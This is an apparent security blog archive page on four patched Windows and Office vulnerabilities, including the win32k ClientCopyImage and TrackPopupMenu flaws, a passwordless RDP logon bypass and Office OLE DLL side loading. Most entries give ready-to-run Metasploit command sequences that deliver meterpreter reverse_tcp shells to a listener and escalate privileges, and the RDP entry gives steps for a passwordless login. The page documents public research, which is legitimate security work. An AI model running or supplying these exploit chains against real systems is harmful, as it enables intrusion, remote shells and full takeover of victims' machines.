Tag Archives: Windows

CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered exploited in the wild by FireEye the 2015-04-13
Patch provided by the vendor via MS15-051 the 2015-05-12
PoC provided by hfiref0x the 2015-05-12
Metasploit PoC provided the 2015-06-03

PoC provided by :

Unknown
hfirefox
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privileges escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid

MS16-007 CVE-2016-0019 Windows RDP Security Bypass

Timeline :

Vulnerability discovered and reported to the vendor by Gal Goldshtein and Viktor Minin of Citadel
Patched by the vendor through MS16-007 the 2016-01-12
Details of the vulnerability provided by Michael Schierl @mihi42 the 2016-01-12

PoC provided by :

Michael Schierl

Reference(s) :

CVE-2016-0019
MS16-007

Affected version(s) :

Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 version 1511 for 32-bit Systems
Windows 10 version 1511 for x64-based Systems

Tested on :

Windows 10 for x64-based Systems with Microsoft Remote Desktop for Mac version 8.0.26

Description :

A security feature bypass vulnerability exists in Windows Remote Desktop Protocol (RDP) that is caused when Windows 10 hosts running RDP services fail to prevent remote logon to accounts that have no passwords set.

Demo :

- On the target Windows 10
Create a local user without password
Grant the created user RDP
- On the client
Add "enablecredsspsupport:i:0" in the ".RDP" file
Connect to the target with the username and without password

CVE-2014-4113 Windows TrackPopupMenu Win32k NULL Pointer Dereference

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS14-058 the 2014–10-14
Metasploit PoC provided the 2014–10-24

PoC provided by :

Unknown
juan vazquez
Spencer McIntyre
OJ Reeves

Reference(s) :

CVE-2014-4113
BID-70364
MS14-058

Affected version(s) :

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 and Windows 8.1
Windows Server 2012 and Windows Server 2012 R2
Windows RT and Windows RT 8.1

Tested on :

on Windows 7 SP1 in combination with CVE-2014-8440 (Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory) vulnerability

Description :

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

use exploit/windows/local/ms14_058_track_popup_menu
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LPORT 4445
set SESSION 1
run

getuid
sysinfo

MS15-132 Office OLE multiple DLL side loading vulnerabilities

Timeline :

Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 the 2015-12-06
Metasploit PoC provided the 2015–12-25 by Securify

PoC provided by :

Yorick Koster

Reference(s) :

CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132

Affected version(s) :

CVE-2015-6128 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10

Tested on :

with Microsoft Office 2013 SP1 on Windows 7 SP1

Description :

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Commands :

use exploit/windows/fileformat/ms15_132_dll_sideload
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Share the output in a remote share folder

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo